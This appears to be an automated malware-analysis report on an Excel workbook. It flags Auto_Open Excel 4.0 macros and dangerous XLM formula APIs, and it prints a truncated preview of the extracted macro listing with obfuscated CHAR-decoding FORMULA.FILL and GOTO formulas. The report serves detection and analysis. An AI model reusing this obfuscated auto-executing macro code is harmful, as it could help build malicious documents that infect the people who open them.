MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The file contains Excel 4.0 macros, specifically an Auto_Open macro, which is a known technique for executing malicious code upon opening the workbook. The heuristics indicate the use of dangerous formula APIs like RUN, suggesting the macro is designed to download and execute a secondary payload. The obfuscated nature of the macro formulas prevents a more precise identification of the payload or its destination.
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 125193 bytes |
SHA-256: 7c8bf6a76e0e589b220da55e9bca58c71a4914bf2dc0b034020525de2d6f6349 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Sheet ' 0018 28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d Sheet!GA22849 ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' Sheet,Reference,Formula,Value ' Sheet,IY18,"",-13.12000976562499943157 ' Sheet,EP49,"",-520.00000000000000000000 ' Sheet,IY107,"",-278.00000000000000000000 ' Sheet,GT119,"",0.31500015258789060280 ' Sheet,BD121,"",0.19182389937106919531 ' Sheet,DT155,"",-0.37459283387622149819 ' Sheet,O171,"",-57.00000000000000000000 ' Sheet,GC173,"",320.75000000000000000000 ' Sheet,DJ241,"",-418.00000000000000000000 ' Sheet,BL242,"",-212.00000000000000000000 ' Sheet,IK261,"FORMULA.FILL(CHAR(BJ60431*GJ47792)&CHAR(GZ25051/HI12290)&CHAR(GG2924*BK4856)&CHAR(G58654-IW42324)&CHAR(IT11337/HZ47368)&CHAR(FL16079-CM65203)&CHAR(GZ25051*S35732)&CHAR(BJ60431+FI60910)&CHAR(BQ45789+JO15482)&CHAR(H30178-JS11400)&CHAR(FL16079*FH39365)&CHAR(GG2924-FJ3128)&CHAR(BQ45789/IN60269)&CHAR(GZ25051-IU681)&CHAR(EN63542+DP24579)&CHAR(BQ45789*FF5949)&CHAR(H30178*HW61714)&CHAR(BQ45789+DA25894)&CHAR(FL16079-HV62498)&CHAR(GZ25051*JI6222)&CHAR(EN63542-IV18019)&CHAR(GZ25051+L17082)&CHAR(BJ60431*GQ27905)&CHAR(FL16079+T12188)&CHAR(BJ60431/FG65032)&CHAR(GZ25051-FL38367)&CHAR(GZ25051-BL242)&CHAR(IT11337-CH62702)&CHAR(GZ25051+CA16580)&CHAR(FL16079-X45618)&CHAR(EN63542-IC61497)&CHAR(GG2924*HF26633)&CHAR(GG2924*BD41648)&CHAR(BJ60431-GN46442)&CHAR(BL37793/HK28393)&CHAR(EN63542*DY43067)&CHAR(EN63542*DP6970)&CHAR(FL16079+X61190)&CHAR(BL37793-DD21559)&CHAR(H30178-B63130)&CHAR(BL37793/HE8639)&CHAR(G58654+CL33844)&CHAR(FL16079-FT30823)&CHAR(EN63542*JI11910),IK262)","" ' Sheet,IK263,GOTO(EC17577),"" ' Sheet,F299,"",0.29523809523809524391 ' Sheet,HF309,"",5.93877551020408134264 ' Sheet,FD371,"",-0.52906976744186051675 ' Sheet,GE385,"",-238.00000000000000000000 ' Sheet,JR408,"",-4.20689655172413790041 ' Sheet,HJ409,"",-273.00000000000000000000 ' Sheet,HQ433,"",2.03896103896103886299 ' Sheet,GE456,"",88.25000000000000000000 ' Sheet,FM474,"",-4.32394366197183099843 ' Sheet,GA489,"",89.25000000000000000000 ' Sheet,DB518,"",1.40833233333333351922 ' Sheet,BA545,"",0.36305832484076427935 ' Sheet,IY563,"",-3.97826086956521729476 ' Sheet,BY596,"",469.00000000000000000000 ' Sheet,HX639,"",-15.00000000000000000000 ' Sheet,IU681,"",-252.00000000000000000000 ' Sheet,JC696,"",-7.65573770491803262672 ' Sheet,EU698,"",70.00000000000000000000 ' Sheet,FA753,"",0.18556701030927835738 ' Sheet,CG822,"",117.00000000000000000000 ' Sheet,EN837,"",-450.00000000000000000000 ' Sheet,DO902,"",4.60869565217391308209 ' Sheet,FS913,"",76.00000000000000000000 ' Sheet,J940,"",0.62244897959183675962 ' Sheet,GA973,"",0.33333333333333331483 ' Sheet,HI1001,"",-12.64000976562500078160 ' Sheet,II1003,"",-0.30327868852459016757 ' Sheet,DX1065,"",-2.34953603703703706174 ' Sheet,GU1074,"",-7.32000488281250039080 ' Sheet,HG1103,"",0.60784313725490191072 ' Sheet,DW1149,"",-242.00000000000000000000 ' Sheet,BV1291,"",-10.40000976562500056843 ' Sheet,IE1291,"",7.38095238095238137532 ' Sheet,DA1314,"",46.00000000000000000000 ' Sheet,EQ1337,"",-102.40007812499999317879 ' Sheet,V1343,"",-16.39999999999999857891 ' Sheet,FM1370,"",0.68367346938775508391 ' Sheet,HZ1410,"",-0.12019230769230769551 ' Sheet,CL1435,"",0.60722891566265058128 ' Sheet,BT1495,"",-37.40001953125000255795 ' Sheet,DG1605,"",5.78181818181818218960 ' Sheet,GU1606,"",-568.00000000000000000000 ' Sheet,CZ1614,"",1.02857142857142846992 ' Sheet,HT1663,"",88.25000000000000000000 ' Sheet,GK1667,"",65.40000000000000568434 ' Sheet,EM1668,"",0.10243902439024389628 ' Sheet,CX1714,"",-2.79090909090909100598 ' Sheet,FB1734,"",10.56701030927835027740 ' Sheet,CW1736,"",-0.82300884955752207084 ' Sheet,FY1765,"",0.69041095890410952851 ' Sheet,CK1784,"",-0.25136612021857923 ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.